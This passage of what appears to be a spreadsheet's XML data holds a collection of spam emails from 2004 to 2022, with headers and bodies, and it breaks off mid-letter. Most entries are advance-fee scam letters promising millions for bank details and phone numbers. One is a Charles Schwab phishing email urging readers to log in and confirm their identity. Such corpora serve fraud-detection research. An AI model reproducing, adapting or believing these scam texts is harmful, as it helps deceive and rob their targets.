    <t>http://shop.di-ve.com</t>
  </si>
  <si>
    <t>743</t>
  </si>
  <si>
    <t>To: massaq1di-ve.com@di-ve.com\nFrom: massaq1@di-ve.com\nDate: Wed, 02 Jun 2004 19:16:33 +0200</t>
  </si>
  <si>
    <t>Wed, 02 Jun 2004 19:16:33 +0200</t>
  </si>
  <si>
    <t>massaq1@di-ve.com</t>
  </si>
  <si>
    <t>massaq1di-ve.com@di-ve.com</t>
  </si>
  <si>
    <t>HELLO FRIEND, PLEASE ASSIST US.</t>
  </si>
  <si>
    <t xml:space="preserve">               PLEASE REPLY TO MY PRIVATE E-MAIL BOX--massaq1@hotmail.com\n\n\nDear Friend,\n\n\n        Through the courtesy of business opportunit, i take liberty\nanchored  on a strong desire to solicit your assistance on this\nmutually beneficial and riskfree transaction which i hope you will give\nyour urgent attention.\n\n        I am Mr. Zabito Massaquoe i am moved to write you this letter,this\nwas incinfidence considration, our present circumstances and\nsituation, i escaped with my wife and children out of Sierrial Leone to\nGhana where we are presently residing on temporary\npolitical asylum.\n\n      However, due to this situation i decided to change most of my\nillions of  Dollars deposited in Swiss Bank and other countries into\nother forms of money coded for safe purpose because the new head of\nstate Ahmed Tijjan Kabba made arrangement with the Swiss Goverment\nand other European countries to freeze all my treasures deposited in\nsome european countries, hence i and my family, decided laying low\nin Africa to study the situation till when things gets better, since\npresident Tijjan Kabba taking over goverment again in Sierria Leone.\n\nOne of my chateaux in Southern France was confiscated by the French\ngoverment, and as such we had to change  our identity so thet our\ninvestment will not be trace and confiscated.\n\n   I  have deposited the sum of Thirty Million,Five Hundred Thousand\nUnited States Dollars{US$30,500,000} with a security company for\nsafekeeping.\n\n  The funds are security coded to prevent them from knowing the actual\ncontent .\n\n What  i want you to do now is to indicate your inetrest that you will\nassist me and my immediate family by receiving the money my behalf.\n\n   The  Account required for this project can be personal, company or an\noffshore account that you have been total control over, your area of\nspecialisation will not be a hinderance to the successful execution\nof this transaction.\n\n     Ackowledge this message, so that i can introduce you to my family as\nour foreign trusted partner who shall take charge of our investment\nabroad where we now plan to settle.\n\n     I want you to assist us in investing this fund or money, but i will\nnot want  our identity revealed. I will also want to buy properties\nand stocks in multy- national companies and to engage in other safe and\nnon speculative investments.\n\n.    We have been through a lot of health and spiritual turmoil, hence\nwill need  your understanding and assistance and may i at this junction\nemphasize the  high level of confidentiality which this business demands\nand hope you will not betral the trust and confidence which we repose in\nyou.\n\n       I shall put you in the picture of this buiness, i.e tell you where\nthe funds are currently being maintained and also discuss other\nmodalities including remuneration for your services.\n\n         I   shall also inform you with the next line of action as soon as\ni receive your response.\n\n        Finaly if this preposition is attainable, Please kindly funish me\nimmediately by E-mail with your direct telephone number and fax\nnumber to enhance the confidentiality which this business demands.\n\n   Best Regards,\n\n    Mr . Zabito  Massaquoe.\n\n    Please reply to my private E-mail box,---massaq1@hotmail.com\n\n\n\n\n\n__________________________________________________________ \n For special offers on latest publications on Malta or by Maltese authors go to [URL]http://shop.di-ve.com[/URL]\n\n</t>
  </si>
  <si>
    <t>742</t>
  </si>
  <si>
    <t>To: yayata2@di-ve.com\nFrom: Abu m.Sesay &lt;abuabu@o2.pl&gt;\nDate: Wed, 02 Jun 2004 18:50:40 +0200</t>
  </si>
  <si>
    <t>Wed, 02 Jun 2004 18:50:40 +0200</t>
  </si>
  <si>
    <t>Abu m.Sesay &lt;abuabu@o2.pl&gt;</t>
  </si>
  <si>
    <t>yayata2@di-ve.com</t>
  </si>
  <si>
    <t>Assistance Me Please.</t>
  </si>
  <si>
    <t>Please REPLY TO MY PRIVATE EMAIL (yayata2@di-ve.com)\n\nFROM:MR.ABU M. SESAY\n\nDEAR FRIEND,\nTHROUGH THE COURTESY OF BUSINESS OPPORTUNITY, I TAKE LIBERTY ANCHORED\nON A\nSTRONG DESIRE TO SOLICIT YOUR ASSISTANCE ON THIS MUTUALLY BENEFICIAL\nAND\nRISKFREE TRANSACTION WHICH I HOPE YOU WILL GIVE YOUR URGENT ATTENTION.\n\nI AM MR.ABU M. SESAY I AM MOVED TO WRITE YOU THIS LETTER ,THIS WAS IN\nCONFIDENCE CONSIDERING OUR PRESENT CIRCUMSTANCE AND SITUATION.\n\nI ESCAPED WITH MY WIFE AND CHILDREN  OUT OF SIERRA LEONE TO GHANA WHERE\nWE\n ARE PRESENTLY RESIDING  ON TEMPORARY POLITICAL ASYLUM.\nHOWEVER DUE TO THIS SITUATION I DECIDED TO CHANGE MOST OF MY\n\nBILLIONS OF DOLLARS DEPOSITED IN SWISS BANK AND OTHER COUNTRIES INTO\nOTHER\nFORMS OF MONEY CODED FOR SAFE PURPOSE BECAUSE THE NEW HEAD OF STATES\nAHMED TIJJAN KABBA MADE ARRANGEMENTS WITH THE SWISS GOVERNMENT AND\nOTHER\nEUROPEAN COUNTRIES TO FREEZE ALL MY TREASURES DEPOSITED IN SOME\nEUROPEAN\nCOUNTRIES,HENCE I AND MY WIFE  ALONG WITH MY CHILDREN, DECIDED LAYING\nLOW\nIN AFRICA TO STUDY THE SITUATION TILL WHEN THINGS GETS BETTER,SINCE\nPRESIDENT TIJJAN KABBA TAKING OVER GOVERNMENT AGAIN IN SIERRA LEONE ONE\nOF\nMY  CHATEAUX IN SOUTHERN FRANCE WAS CONFISCATED BY THE FRENCH\nGOVERNMENT,AND AS SUCH WE HAD TO CHANGE OUR IDENTITY SO THAT OUR\nINVESTMENT WILL NOT BE TRACED AND CONFISCATED.\n\nI HAVE DEPOSITED THE SUM OF THIRTY MILLION,FIVE HUNDRED THOUSAND UNITED\nSTATES DOLLARS(US$30,500,000)WITH A SECURITY COMPANY FOR SAFEKEEPING.\n\nTHE FUNDS ARE SECURITY CODED TO PREVENT THEM FROM KNOWING THE ACTUAL\nCONTENTS.\n\nWHAT I WANT YOU TO DO NOW IS TO INDICATE YOUR INTEREST THAT YOU WILL\nASSIST ME AND MY IMMEDIATE FAMILY BY RECEIVING THE MONEY ON OUR BEHALF.\n\nTHE ACCOUNT REQUIRED FOR THIS PROJECT CAN EITHER BE PERSONAL,COMPANY OR\nAN\nOFFSHORE ACCOUNT THAT YOU HAVE TOTAL CONTROL OVER,YOUR AREA OF\nSPECIALISATION WILL NOT BE A HINDERANCE TO THE SUCCESSFUL EXECUTION OF\nTHIS TRANSACTION.\n\nACKOWLEDGE THIS MESSAGE,SO THAT I CAN INTRODUCE YOU TO MY FAMILY AS OUR\nFOREIGN TRUSTED PARTNER WHO SHALL TAKE CHARGE OF OUR INVESTMENT ABROAD\nWHERE WE NOW PLAN TO SETTLE.\n\nI WANT YOU TO ASSIST US IN INVESTING THIS MONEY,BUT I WILL NOT WANT OUR\nIDENTITY REVEALED.I WILL ALSO WANT TO BUY PROPERTIES AND STOCKS IN\nMULTI-NATIONAL COMPANIES AND TO ENGAGE IN OTHER SAFE AND NON\nSPECULATIVE\nINVESTMENTS.\n\nWE HAVE BEEN THROUGH A LOT OF HEALTH AND SPIRITUAL TURMOIL,HENCE WILL\nNEED\nYOUR UNDERSTANDING AND ASSISTANCE.\n\nMAY I AT THIS POINT EMPHASIZE THE HIGH LEVEL OF CONFIDENTIALLITY WHICH\nTHIS BUSINESS DEMANDS AND HOPE YOU WILL NOT BETRAY THE TRUST AND\nCONFIDENCE WHICH WE REPOSE IN YOU.I SHALL PUT YOU IN THE PICTURE OF\nTHIS\nBUSINESS,I.E TELL YOU WHERE THE FUNDS ARE CURRENTLY BEING MAINTAINED\nAND\nALSO DISCUSS OTHER MODALITIES INCLUDING REMUNERATION FOR YOUR SERVICES.\n\nI SHALL INFORM YOU WITH  THE NEXT LINE OF ACTION AS SOON AS I RECEIVE\nYOUR\nPOSITIVE RESPONSE.\n\nIS THIS PROPOSITION ATTAINABLE?IF IT IS,PLEASE KINDLY FURNISH ME\nIMMEDIATELY BY E-MAIL WITH YOUR DIRECT TELEPHONE AND FAX NUMBERS TO\nENHANCE THE CONFIDENTIALLITY WHICH THIS BUSINESS DEMANDS.\nBEST REGARDS\nMR.ABU M.SESAY.\n\n\n__________________________________________________________ \n For special offers on latest publications on Malta or by Maltese authors go to [URL]http://shop.di-ve.com[/URL]\n\n</t>
  </si>
  <si>
    <t>738</t>
  </si>
  <si>
    <t>To: nan\nFrom: Josef Bala &lt;josef_bala@x-sub.de&gt;\nDate: Wed, 02 Jun 2004 13:34:54 +0200</t>
  </si>
  <si>
    <t>Wed, 02 Jun 2004 13:34:54 +0200</t>
  </si>
  <si>
    <t>Josef Bala &lt;josef_bala@x-sub.de&gt;</t>
  </si>
  <si>
    <t>Business Enqiry/Partnership</t>
  </si>
  <si>
    <t>Business Enqiry/Partnership\nMy name is Mr Josef Bala of Nigerian Investment Promotion Council.\n\nI am constrained to send this enquiry by this medium, hence,certain details will invariably be left out at this stage until we have both satisfied ourselves that we are comfortable enough to move to the next stage \n\nI have provided below a brief outline of the proposition.\nPlease bear in mind that details will be forwarded only via a secure fax line or extremely secure email.\n\nBUSINESS OBJECT:  Financial investment\nSIZE OF BUSINESS: US$23.2M (Twenty three Point two million US Dollars)\nINVESTMENT REQUIREMENT: Logistics/Partnership support/consultancy\nTERMS OF PARTNERSHIP:   Up to 8% or more  all terms to be negotiated\n\nA clients have briefed me source for viable investments and logistics support can accommodate the above amount.\n\nKindly contact me if you have a business facility or logistic capability to absorb up to the amount stated above or can provide a consultancy service that can lead to lucrative investments in your country or elsewhere\n\nMore information regarding this transaction will be made available to you as soon as we can secure your interest.\n\nYou shall be entitled to commission on investement or flat offer of 8% (Negotiable) of the \nfund as reward for any assistance from you.\n\nIn case you do not have interest or the kind of facility that can \ncarry out this volume of business, do forward this massage back to me and \nstate clearly your position.\n\nYou can equally mail me at : Josef_bala@yahoo.com\n\nThank you \n\nJosef Bala (Esq)\n\n \n\n\n\n\n_________________________________________________________________\nPowered by x-SubMail- [URL]www.x-Sub.de[/URL]\n</t>
  </si>
  <si>
    <t>www.x-Sub.de</t>
  </si>
  <si>
    <t>1379</t>
  </si>
  <si>
    <t>To: Recipients &lt;mayra.parrales@hgj.gob.ec&gt;\nFrom: "Charles Schwab" &lt;mayra.parrales@hgj.gob.ec&gt;\nDate: Wed, 02 Feb 2022 15:37:52 +0000</t>
  </si>
  <si>
    <t>Wed, 02 Feb 2022 15:37:52 +0000</t>
  </si>
  <si>
    <t>"Charles Schwab" &lt;mayra.parrales@hgj.gob.ec&gt;</t>
  </si>
  <si>
    <t>Recipients &lt;mayra.parrales@hgj.gob.ec&gt;</t>
  </si>
  <si>
    <t>Review Alert</t>
  </si>
  <si>
    <t>February 02, 2022	 	    	 	      	 	 	 	 	  	 	    	 	             	 	    	 	 Schwab Notification: Action Required   Do not Ignore 	  	       	 	  Dear Customer, You have a new security message notifications from CHARLES SCHWAB For security reasons. A Temporary Hold was Placed on Your Account due to Incomplete Review.   Click now [URL]www.schwab.com[/URL]  to read your Message notification and complete review. Upon logging in, you may be asked to confirm your identity. Thank you for the opportunity to serve you. 	 	       	 	       	 UNSUBSCRIBE	 PRIVACY	 MESSAGES	  LOG IN	          	 	    	 Independent investment advisors are not owned by, affiliated with or supervised by Schwab. If you have any questions or concerns, please do not reply to this email. Please contact the Schwab Alliance team at 800-515-2157. For your protection, we are unable to accept instructions to change your email address sent in reply to this message. To update your address using a secure channel, please log in to your account. For your security, Charles Schwab will never request personal information through email. Learn more about Schwab security practices, including the Schwab Security Guarantee. NOTICE: All email sent to or from the Charles Schwab corporate email system is subject to archival, monitoring, and/or review by Schwab personnel. Charles Schwab &amp; Co., Inc., 211 Main Street, San Francisco, CA 94105 ©2022 Charles Schwab &amp; Co., Inc.("Schwab") All rights reserved. Member SIPC. (0117-0004) 99RAO	    February 02, 2022 Schwab Notification: Action Required  Do not Ignore Dear Customer,You have a new security message notifications from CHARLES SCHWABFor security reasons. A Temporary Hold was Placed on Your Account due to Incomplete Review.  Click now [URL]www.schwab.com[/URL]  to read your Message notification and complete review.Upon logging in, you may be asked to confirm your identity.Thank you for the opportunity to serve you. UNSUBSCRIBE PRIVACY MESSAGES  LOG IN Independent investment advisors are not owned by, affiliated with or supervised by Schwab.If you have any questions or concerns, please do not reply to this email. Please contact the Schwab Alliance team at 800-515-2157.For your protection, we are unable to accept instructions to change your email address sent in reply to this message. To update your address using a secure channel, please log in to your account.For your security, Charles Schwab will never request personal information through email.Learn more about Schwab security practices, including the Schwab Security Guarantee.NOTICE: All email sent to or from the Charles Schwab corporate email system is subject to archival, monitoring, and/or review by Schwab personnel.Charles Schwab &amp; Co., Inc., 211 Main Street, San Francisco, CA 94105©2022 Charles Schwab &amp; Co., Inc.("Schwab") All rights reserved. Member SIPC.(0117-0004) 99RAO</t>
  </si>
  <si>
    <t>www.schwab.com www.schwab.com</t>
  </si>
  <si>
    <t>2393</t>
  </si>
  <si>
    <t>To: smart_60@latinmail.com &lt;smart_60@latinmail.com&gt;\nFrom: smart gordon &lt;smart_60@latinmail.com&gt;\nDate: Wed, 02 Aug 2006 12:11:44 +0200</t>
  </si>
  <si>
    <t>Wed, 02 Aug 2006 12:11:44 +0200</t>
  </si>
  <si>
    <t>smart gordon &lt;smart_60@latinmail.com&gt;</t>
  </si>
  <si>
    <t>smart_60@latinmail.com &lt;smart_60@latinmail.com&gt;</t>
  </si>
  <si>
    <t>GET BACK TO ME  FROM ENG. SMART</t>
  </si>
  <si>
    <t>ENG. SMART GORDON\nTHE TASK FORCE CHAIRMAN\nNIGERIAN NATIONAL PETROLEUM CORPRATION\nNNPC TOWERS, HERBERT MCCAULEY WAY \nBUSINESS DISTRICT, GARKI, ABUJA. \n\nATTENTION PLEASE,\n\nI GREET YOU IN THE NAME OF OUR LORD JESUS CHRIST AND MY COMING TO YOU IS NOT BY CHANCE BUT BY THE DIVINE GRACE OF GOD AS IT IS MY PLEASURE TO CONTACT YOU FOR ASSISTANCE AND BUSINESS CO-OPERATION.I ASSURE YOU THAT IT IS GOING TO GO ALONG WAY IN HELPING THE LESS PRIVILEDGED ONE IN THE SOCIETY. \n\nI AM ENGR.SMART GORDON, THE PRESIDENT OF A SPECIAL TASK FORCE IN CHARGE OF THE SALES OF PETROLEUM PRODUCTS IN THE FEDERAL REPUBLIC OF NIGERIA. MY OFFICE MONITORS THE SALES AND LIFTING OF CRUDE OIL AND PETROLEUM PRODUCT BY FOREIGN DEALERS. WITH THE COOPERATION OF MY ASSISTANT AND HEAD OF THE AUDIT COMMITTEE ATTACHED TO THE TASK FORCE, I HAVE SUCCESSFULLY SAVED ABOUT $12.6MILLION US DOLLARS.I WANT TO INVEST THIS MONEY IN THE LIFE OF THE LESS PRIVILEDGED ONES IN THE SOCIETY BY BUILDING FOUNDATIONS AND CHARITY HOMES IN DIFFERENT PART OF THE WORD BUT I CANNOT DO IT ALONE AND THAT IS WHY I CAME TO YOU WITH CLEAN/CLEAR MIND.\n\nTHIS MONEY AS A RESULT OF ALLOCATION OF EXCESS CRUDE OIL TO THE FOREIGN DEALERS, WHICH HAS BEEN SOLD BUT WHICH MONEY IS NOT ENTERED IN THE FINANCIAL STATEMENT OF MY TASK FORCE, KNOWS CURRENT THE RISE OF OIL PRICES THIS MONEY IS NOW LYING UNCLAIMED IN THE ACCOUNT OF THE TASK FORCE, KNOWN ONLY TO MY PARTNERS AND ME INVOLVED IN THE EXCESS ALLOCATION.\n\nHOWEVER, THE LEGISLATORS OF THE DEMOCRATIC GOVERNMENT OF MY COUNTRY HAVE SET UP A PANEL TO LOOK INTO THE ACTIVITIES OF SOME GOVERNMENT COMPANIES AND PARASTATALS. WE DO NOT WANT THE PANEL TO DISCOVER THE MONEY WE SAVED. WE CANNOT LODGE THIS MONEY INTO OUR PRIVATE BANK ACCOUNT IN MY COUNTRY, PUBLIC SERVANTS ARE NOT PERMITTED TO OPERATE ANY ACCOUNT IN EXCESS OF $500,000 U.S DOLLARS.\n\nNOW THE IDEA IS TO HAVE A FOREIGN PARTNER WHOM THE SUM WILL BE TRANSFERRED TO. WE HAVE CONCLUDED ARRANGEMENT TO TRANSFER THIS MONEY TO YOUR PRIVATE BANK ACCOUNT IF YOU PERMIT US TO USE IT. ALL YOU HAVE TO DO IS TO SEND ME YOUR PRIVATE PHONE I WILL SEND YOU THE DETAILS OF THE TRANSFER AND NECESSARY DOCUMENT AS THE BENEFICIARY.\n\nPLEASE ON YOUR REPLY, WE WILL BE ABLE TO DISCUSS THE MODALITIES. WE INTEND TO INVEST OUR SHARE OF THE SUM IN BUSINESS WITH YOUR KNOWLEDGE AND PAST EXPERIENCE YOUR ADVICE WILL BE HIGHLY NEEDED FOR THE INVESTMENT. I ASSURE IT IS SAFE AND NO RISK IS INVOLVED. NO OTHER PARTY IS AWARE OF THE SUM FROM THE EXCESS ALLOCATION EXCEPT MY PARTNER AND ME. HOWEVER, THIS TRANSACTION SHOULD BE SECRET AND CONFIDENTIAL.\n\nWE AWAITS YOUR REPLY ON YOUR PARTICIPATION, TIME IS OF GREAT ESSENCE TO US. AS I REALLY NEED YOU CORPORATION.\n\nREGARDS\nENGR.SMART GORDON\n\n\n\n¡Miles de amigos con tus mismas aficiones! [URL]http://www.latinchat.com[/URL]</t>
  </si>
  <si>
    <t>1852</t>
  </si>
  <si>
    <t>To: rose_david@mail.ru\nFrom: Mrs Rose David &lt;rose_david@mail.ru&gt;\nDate: Wed, 01 Mar 2006 20:49:08 +0300</t>
  </si>
  <si>
    <t>Wed, 01 Mar 2006 20:49:08 +0300</t>
  </si>
  <si>
    <t>Mrs Rose David &lt;rose_david@mail.ru&gt;</t>
  </si>
  <si>
    <t>rose_david@mail.ru</t>
  </si>
  <si>
    <t>urgent reply</t>
  </si>
  <si>
    <t>\n\n\nDear\nI salute you in the name of the most High! My name is Mrs. Rose Ameeraly.\n\nAm a widow and a mother of two girls. We do not know each other and I'm wondering how you will view this letter. Please, accept my sincere apology. Sorry, about taking your time as well. I will be highly obliged if you can assist me in this business. My Husband is an Nigerian while I am a Ghanaian. My late husband, David Ameeraly, was a loving, caring and hardworking businessman. Prior to his death by plane crash, he was living with us in Accra, Ghana. He died November 1st 1990. This sad event occurred during one of his business trips to the US. Please, find below the website for more information. If you go through this publication critically, you will find my husband's name, David Ameeraly amongst others that lost their life on that fateful day as published by British Broadcasting Corporation (BBC) [URL]http://news.bbc.co.uk[/URL]\nBefore the sudden death of my beloved husband, he planned to establish a business in Europe with the sum of US$ 21.5 Dollars (Twenty One Million, five hundred thousand Dollars only). Unfortunately, he died before this venture could materialize. Following his death, his family members insisted that I am not entitled to his properties (assets and money).\n\nSince I am a woman and my offsprings are all girls coupled with the fact that I do not have a male child, I was put under terrible pressure to stay clear from my legitimate husband estates According to their family culture/traditional believe, a woman is not allowed to run late\nhusband business and worst of all, I was asked to move into David's younger brother's household as one of his wives. My problem started when I refused to be inherited by David's younger brother. Fortunately,  the proposed investment fund US$ 21.5 Dollars (Twenty One Million, five hundred thousand Dollars only). that was deposited with the investment/security company was unknown to the family. As such, they did not ask for this. If not, it would have been a problem as there would have been nothing to fall back on. It's only our lawyer &amp; my humble self that know of this fund. I have discussed this matter with the Finance company were the fund was lodged. This is the asset I have left and I need part of this money for my daughters school fees and to maintain my personal life as well. David's family was vehemently against my daughters education. All they intend doing,\nwas to give them out for marriage at a tender age. According to the staff of the finance company, the best way to secure this money is to transfer this money into an alternative bank account for safekeeping.\n\nLater it will be used for business investment which is subject to the advise of whoever that will be assisting us finally.\nFor obvious reasons, I do not want the finance company's involvement.\nThis transaction must be handled under strict confidentiality. At this juncture, I thought it wise to solicit your indispensable assistance to receiving this fund on my behalf. I do not have knowledge of funds management &amp; business in general. I was a full-time housewife.\nTherefore, this step depends on your trust-worthiness &amp; ability to handle funds of this magnitude. All that is required of you, is to forward to me by email, your direct phone, fax, address or any other information you may deem helpful. I need the requested information for the purpose of securing the relevant documents in your name as my confidante/ bona fide beneficiary. Please, note that this transaction is legitimate and 100% hitch-free. We will not violate any known law of my country and that of yours. So, be rest-assured.\nHowever, as soon as I receive your positive response to the above business transaction, I shall provide you with necessary transfer details. Note also, that you must convince me of your trust-worthiness and ability to keep secret. I have decided to compensate you with 30%\nof the total money as a reward for your sincere assistance and the remaining 70% will be used to pursue my late husband's investment dream in real estate.\nThanking you for your anticipated response as I look forward to hearing\nfrom you.\nI remain.\nSincerely yours,\nMrs.Rose David Ameeraly\n \n\n\n\n\n\n</t>
  </si>
  <si>
    <t>1848</t>
  </si>
  <si>
    <t>To: staff_ubang@mail.ru\nFrom: staff uba &lt;staff_ubang@mail.ru&gt;\nDate: Wed, 01 Mar 2006 16:41:21 +0300</t>
  </si>
  <si>
    <t>Wed, 01 Mar 2006 16:41:21 +0300</t>
  </si>
  <si>
    <t>staff uba &lt;staff_ubang@mail.ru&gt;</t>
  </si>
  <si>
    <t>staff_ubang@mail.ru</t>
  </si>
  <si>
    <t>URGENT.</t>
  </si>
  <si>
    <t>DEAR FRIEND,\n   I AM MR.CHARLES WEST, THE BANK MANAGER OF UNITED BANK OF AFRICAN.\n  I WISH TO ASCERTAIN YOUR INTEREST AND CAPABILITY TO CO-OPERATION WITH \nME IN ACTUALIZING THIS HIGHLY URGENT DEAL IN REPATRAITING FUNDS TO YOUR \nCOUNTRY.\n  A FOREIGNER, LATE ENGR JOHN  DACEY (SNR) AN OIL MERCHANT WITH THE FEDERAL GOVERNMENT OF NIGERIA, UNTIL HIS DEATH IN 2002 BALI BOMBING  WHILE ON VACATION, BANKED WITH OUR BANK IN NIGERIA AND HAD A CLOSING \nBALANCE AS AT THE END OF NOVEMBER, 2001 WORTH USD12, 000,000.00 (TWELVE \nMILLION UNITED STATE DOLLARS), THE BANK NOW EXPECTS A NEXT OF KIN AS \nBENEFICIARY.VALUABLE EFFORTS HAVE BEEN MADE BY THE BANK TO GET IN \nTOUCH WITH ANY OF THE DACEY'S FAMILY OR RELATIVES BUT TO NO SUCCESS.\nIT IS BECAUSE OF THE PERCEIVED POSSIBILITY OF NOT BEING ABLE TO LOCATE \nANY OF LATE ENGR.JOHN DACEY (SNR)'S NEXT OF KIN (THE WIFE AND KIDS WAS \nINVOLVE IN THE EXPLOSION THAT IS KNOWN TO US).THE MANAGEMENT UNDER THE \nINFLUENCE OF OUR CHAIRMAN WHO IS A MUSLIM AND MEMBERS OF THE BOARD OF DIRECTORS, THAT ARANGE HAS BEEN MADE FOR THE FUND TO BE DECLEARED "UNCLAINMED" AND DECLEARED "UNCLAINMED" AND SUBSEQUENTLY BE DONATED TO THE TRUST FUND FOR ARMS AND AMMUNITION TO FURTHER ENHANCE THE COURSE OF WAR AND TERRORISM IN THE WORLD IN GENERAL.IN ORDER TO AVERT THIS NEGATIVE DEVELOPMENT\n I NOW SEEK YOUR PERMISSION TO HAVE YOU STAND AS NEXT OF \nKIN TO LATE ENGR. JOHN DACEY (SNR) SO THAT THE FUND USD12 MILLION WILL \nBE RELEASED AND PAID INTO YOUR ACCOUNT AS THE BENEFICIARY'S NEXT OF \nKIN. ALL DOCUMENTS AND PROVES TO ENABLE YOU GET THIS FUND WILL BE \nCAREFULLY WORKED OUT.\n  AND MORE SO I AM ASSURING YOU THAT THIS BUSINESS IS 100% RISK FREE \nINVOLVEMENT.YOUR SHARE STAYS WHILE THE REST BE FOR MY FOR INVESTMENT \nPURPOSE.\nACCORDING TO AGGREMENT WITHIN BOTH PARTIES AS SOON AS I RECIEVE AN \nACKNOWLEDGEMENT OF RECEIPT OF THIS MESSAGE IN ACCEPTANCE OF MY MUTUAL \nBUSINESS PROPOSAL TO YOU,I WILL FURNISH YOU WITH THE NECCESSARY \nMODALITIES AND DISBURSEMENT RATIO TO SUITE BOTH PARTIES WITHOUT ANY \nCONFLICT.\nIF THIS PROPOSAL IS ACCEPTABLE BY YOU DO NOT MAKE UNDUE ADVANTAGE OF \nTHE TRUST I HAVE BESTOWED IN YOU, THEN KINDLY GET BACK TO ME \nIMMEDIATELY THROUGH MY PRIVATE EMAIL ADDRESS \ncharleswest_1960s@yahoo.com.\n  PLEASE FURNISH ME WITH YOUR MOST CONFIDENTIAL TELEPHONE, FAX NUMBERS \nSO THAT I CAN USE THE INFORMATION TO GET IN TOUCH WITH YOU FOR MORE \nINFORMATION CLARIFICATION ON THIS REGARDS\nTHANK YOU IN ADVANCE FOR YOUR ANTICIPATED CO-ORPORATION.\nYOURS FAITHFULLY,\nMR.CHARLES WEST.\n\n\nАнекдоты от сисадминов [URL]http://r.mail.ru[/URL]\n\n\n\n\n</t>
  </si>
  <si>
    <t>http://r.mail.ru</t>
  </si>
  <si>
    <t>1847</t>
  </si>
  <si>
    <t>To: nan\nFrom: asita &lt;ali@sunumail.sn&gt;\nDate: Wed, 01 Mar 2006 11:34:26 -0000</t>
  </si>
  <si>
    <t>Wed, 01 Mar 2006 11:34:26 -0000</t>
  </si>
  <si>
    <t>asita &lt;ali@sunumail.sn&gt;</t>
  </si>
  <si>
    <t>TREAT AS URGENT AND CONFIDENTIAL.</t>
  </si>
  <si>
    <t>&gt;From The Desk Of SAITA  ALI\nSenior Staff In File Department,\nAfrican Development Bank A.D.B\nOuagadougou Burkina-Faso\nWest Africa.\n\nPrivate Number......00226 76 52 47 43\nPLANE CRASH WEB SITE\nhttp:\n\n//[URL]www.cnn.com[/URL]\n            ( "REMITTANCE OF $15 MILLION U.S.A DOLLARS\n                     CONFIDENTIAL IS THE CASE")\n\nCompliment Of The Season,\n\nOn a very good day. I am (ASITA ALI)a senior\nstaff in file department in African developent bank (ADB).I got your\ncontact from a Yahoo Tourist Search.\n\nWhen i was searching for a foreign partner i assured of\nyour capability\nand reliability to champion this businees opportunity when\ni prayed to God or Allah about you.In my department we discovered an\nabandoned sum of $ 15 million U.S.A dollars ( fifteen million U.S.A\ndollars) . In an account that belongs to one of our foreign customer who\ndied along with his entire family in (friday december 26,2003  ) in a\nplane crash.\n\nSince we got information about his death, we have been expecting his next\nof kin to come over and claim his money because we cannot release it\nunless\nsomebody applies for it as next of kin or relation to the deceased as\nindicated in our banking guidelines, but unfortunately we learnt that all\nhis supposed next of kin or relation died alongside with him at the plane\ncrash leaving nobody behind for the claim.\n\nIt is therefore upon this discovery that I and one official in my\ndepartment now decided to make this businness proposal to you and release\nthe money to you as the next of kin or relation to the deceased for safety\nand subsequent disbursement since nobody is coming for it and we dont\nwant this money to go into the bank treasury as unclaimed bill.\n\nThe Banking law and guideline here stipulates that if such\nmoney remained unclamed after five years, the money will be\ntransfered into the Bank treasury as unclaimed fund. The request of\nforeigner as next of kin in this business is occasioned by the fact that\nthe customer was a foreigner, and a Burkinabe cannot stand as next of kin\nto a foreigner.\n\nWe agree that 30 % of this money will be for you as foreign partner, in\nrespect to the provision of a foreign account, 10 % will be set aside for\nexpenses incured during the business and 60 % would be for\n;me and my woman colleague. There after I and my colleague will visit your\ncountry for disbursement according to the percentages indicated.\n\nTherefore to enable the immediate trnansfer of this fund to you as\narranged, you must apply first to the bank as relations or next of kin of\nthe deceased indicating your bank name, your bank account\nnumber, your private telephone and fax number for easy and effective\ncommunication and location where the money will be remitted.\n\nUpon receipt of your reply, I will send to you by fax or email the text of\nthe application I will not fail to bring to your notice that this\ntransaction is hitch free and that you should not entertain any atom of\nfear as all required arrangements have been made for the transfer.\n\nYou should contact me on my number 00226 76 52 47 43\nimmediately as soon\nas you receive this letter. Trusting to hear from you\nimmediately.\n\nYours faithfully,\nASITA ALI\n\nPOST SCRITUM:You have to keep everything secret as to\nenable the transfer to move very smoothly in to the account you will prove\nto the bank.As you finished reading this letter call me\nimmediately so that we discuss very well over this business.Please call me\nand inform me that you received my mail, because i don't go to net always.\n.........................................................................................\n\n\n\n\n\n\n\n\n\n</t>
  </si>
  <si>
    <t>1846</t>
  </si>
  <si>
    <t>To: nan\nFrom: ABDULAHI ISSA &lt;abdul_issa07@sunumail.sn&gt;\nDate: Wed, 01 Mar 2006 10:54:14 -0000</t>
  </si>
  <si>
    <t>Wed, 01 Mar 2006 10:54:14 -0000</t>
  </si>
  <si>
    <t>ABDULAHI ISSA &lt;abdul_issa07@sunumail.sn&gt;</t>
  </si>
  <si>
    <t>FROM THE DESK OF DR .ABDULAHI</t>
  </si>
  <si>
    <t>FROM THE DESK OF DR .ABDULAHI\nBILL AND EXCHANGE MANAGER\nBANK OF AFRICA.\nOUAGADOUGOU,BURKINA FASO.\nTOP SECRET\nDear Friend\n\nI am DR. ABDULAHI. the bill and exchange manager at the foreign remittance\ndepartment of BANK OF AFRICA. I got your contact from the internet ,while\nseaching for an honest and trust worthy person, who will assist me to\nimplement this transfer.l discovered the sum of Twenty Two Million and\nfive hundred Thousand United States Dollars (USD22.5M) belonging to a\ndeceased customer of this bank.\n\n The fund has been lying in a suspence account without anybody coming to\nput claim over the money since the account owner late Mr JOHN KOROVO from\nJORDAN , who was involved in the December 25th  2003 Benin plane crash.\n Here is the air crash  website on cn\n[URL]http://www.cnn.com[/URL]\n\nThe said fund is now ready for transfer to a foriegn account whose owner\nwill be portrayed as the beneficiary and next of kin to the deceased\ncustomer of the bank. Since we got information about his death, we have\nbeen expecting his next of kin to come over and claim his money because we\ncannot release it unless somebody applies for it as next of kin or\nrelation to the deceased as indicated in our banking guidlines and laws\nbut unfortunately we learnt that all his supposed next of kin or relation\ndied alongside with him at the plane crash leaving nobody behind for the\nclaim.\n\nIt is therefore upon this discovery that I decided to make this business\nproposal to you and release the money to you as the next of kin or\nrelation to the deceased for safety and subsequent disbursement since\nnobody is coming for it and I don't want this money to go into the bank\ntreasury as unclaimed bill.\n\nThe banking law and guidline here stipulates that if such money remained\nunclaimed after five years, the money will be transfered into the bank\ntreasury as unclaimed fund. The request of foreigner as next of kin in\nthis business is occassioned by the fact that the customer was a foreigner\nand a Burkinabe cannot stand as next of kin to a foreigner. I therefore\nsoliciting for your assistance to come forward as the next of kin.\n I have agreed that 40% of this money will be for you as the 